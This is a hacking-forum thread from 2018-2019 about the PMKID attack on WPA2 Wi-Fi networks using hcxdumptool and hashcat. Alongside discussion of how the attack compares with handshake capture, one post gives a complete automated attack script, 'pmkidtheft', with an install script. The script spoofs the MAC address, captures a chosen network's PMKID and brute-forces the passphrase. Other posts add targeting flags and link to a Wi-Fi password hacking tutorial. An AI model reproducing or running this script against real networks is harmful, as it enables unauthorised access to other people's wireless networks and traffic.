Exmix Posted August 8, 2018 Posted August 8, 2018 (edited) I found this the other day and thought if some of oyu haven't seen it, you might find it interesting. I have yet to test it myself but plan to soon. Hachcat PMKID Edited August 8, 2018 by Exmix 2 1 Quote
theUNK0WN Posted August 8, 2018 Posted August 8, 2018 Interesting! I will have to read up this when I have time. Quote
Forkish Posted August 8, 2018 Posted August 8, 2018 If you’re an auditory learner, the latest podcast Security Now with Steve Gibson is about this. Quote
PoSHMagiC0de Posted August 12, 2018 Posted August 12, 2018 Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting> Else it goes after every beacon it hears. You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID. Have to check if there is a param to quit after 1 pmkid is captured for automation. 1 Quote
L07TB0Y Posted August 18, 2018 Posted August 18, 2018 now can someone port it over to PineApple 1 Quote
vailixi Posted August 30, 2018 Posted August 30, 2018 This is hasty first draft. I scripted this attack. It's 5:20AM here and I haven't slept. (Neighborhood watch) This is most of what you need to get started. I've included an install script below as well. You'll need to run both as root. Usage ./pmkidtheft -E <ESSID> #!/bin/bash echo " _____ __ __ _ _______ _____ _______ _ _ ______ ______ _______ " echo " | __ \| \/ | |/ /_ _| __ \__ __| | | | ____| ____|__ __|" echo " | |__) | \ / | ' / | | | | | | | | | |__| | |__ | |__ | | " echo " | ___/| |\/| | < | | | | | | | | | __ | __| | __| | | " echo " | | | | | | . \ _| |_| |__| | | | | | | | |____| | | | " echo " |_| |_| |_|_|\_\_____|_____/ |_| |_| |_|______|_| |_| " echo " Automated WPA2 PIMKID cracking tool by Vailixi 2018" #### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU #### POSITIONAL=() while [[ $# -gt 0 ]] do key="$1" case $key in -h|--help) HELP="$2" printf "\n" echo " USAGE:" echo " pmkidtheft -E <ESSID>" printf " \n" shift # past argument shift # past value exit 0 ;; -E|--ESSID) ESSID="$2" shift # past argument shift # past value ;; *) # unknown option POSITIONAL+=("$1") # save it in an array for later shift # past argument ;; esac done set -- "${POSITIONAL[@]}" # restore positional parameters if [ $# -eq 0 ]; then printf "\n" echo " USAGE:" echo " pmkidtheft.sh -E <ESSID>" printf " \n" exit 1 fi systemctl stop NetworkManager systemctl stop wpa_supplicant systemctl stop dhclient airmon-ng check kill wifi=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g) mon=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon') ifconfig $wifi down macchanger -r $wifi ifconfig $wifi up airmon-ng start $wifi timeout 10 airodump-ng wlan0mon -w wifis --write-interval 5 -o csv cat wifis.csv | grep $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3 hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show airmon-ng stop $mon systemctl start NetworkManager systemctl start wpa_supplicant systemctl start dhclient #!/bin/bash #### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y apt-get install opencl -y apt-get install ocl-icd-opencl-dev -y git clone https://github.com/ZerBea/hcxdumptool cd hcxdumptool make make install git clone https://github.com/ZerBea/hcxtools cd hcxtools make make install git clone https://github.com/hashcat/hashcat cd hashcat make make install Quote
icarus255 Posted October 23, 2018 Posted October 23, 2018 I'm not sure why the PMKID attacks (and hcxdumptool) are not as well known or discussed as they should be. I know wifi has been done to death but people are still posting questions on the forums about why their deauth attacks aren't working or why they can't capture a 4-way handshake. To be honest, I didn't know about this attack vector until a week ago myself when I read a post on the hascat forums (refer to link in OP or https://hashcat.net/forum/thread-7717-post-41446.html I tested hcxdumptool and there are several considerable advantages of using this new method over the “traditional” 4-way handshake approach i.e. sometimes it’s a lot easier to request a single EAPOL frame (with a PMKID) than waiting or forcing a 4-way handshake. Only needing one EAPOL frame also means you can target client-less APs or AP-less clients (refer to link above for details). Not all vendors/devices are vulnerable because sending the PMKID is optional i.e. EAPOL frames do not need to contain the PMKID for an AP and client to authenticate. It doesn't seem to be a legacy issue - to me it seems that a lot of vendors leave it enabled by default. There is also no advantage that I can see of using a captured PMKID over a captured 4-way handshake for "cracking purposes" i.e. you will have captured all the crypto values needed but in different ways. You will still have to bruteforce/dictionary attack the key like you normally would with hashcat or JTR. Hashing speeds look similar from my unscientific tests using both modes in hashcat (someone please confirm). In my opinion, the PMKID attack methods are a great alternative to the traditional 4-way handshake approach (if the device is vulnerable) because they can be less disruptive to the target network/device. I don’t normally advocate automated tools but some of the options of hcxdumptool are definitely worth exploring. On 8/11/2018 at 11:26 PM, PoSHMagiC0de said: Tried it, it works. Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting> Else it goes after every beacon it hears. You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID. Agree. Be careful running hcxdumptool first time because default attack mode is very aggressive i.e. it will try all possible attacks (including deauth and disassociate) on any wifi device it picks up in range so use a filter with your device bssids only. Quote
nikmel420 Posted January 26, 2019 Posted January 26, 2019 (edited) https://github.com/hackthebox/PMKID yea there are modules out but getting them installed i cant seem to do. i jusst learned of them recently and work great using my regular alfa adapters in parrot or kali. i cant wait till i figure out the step im missing to get on pineapple. Edited January 26, 2019 by nikmel420 Quote
FHXploit Posted February 25, 2019 Posted February 25, 2019 if you wanna tutorial how to hack wifi password using windows, check this https://www.fhxploit.com/2018/01/cara-hack-password-wi-fi-menggunakan.html Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.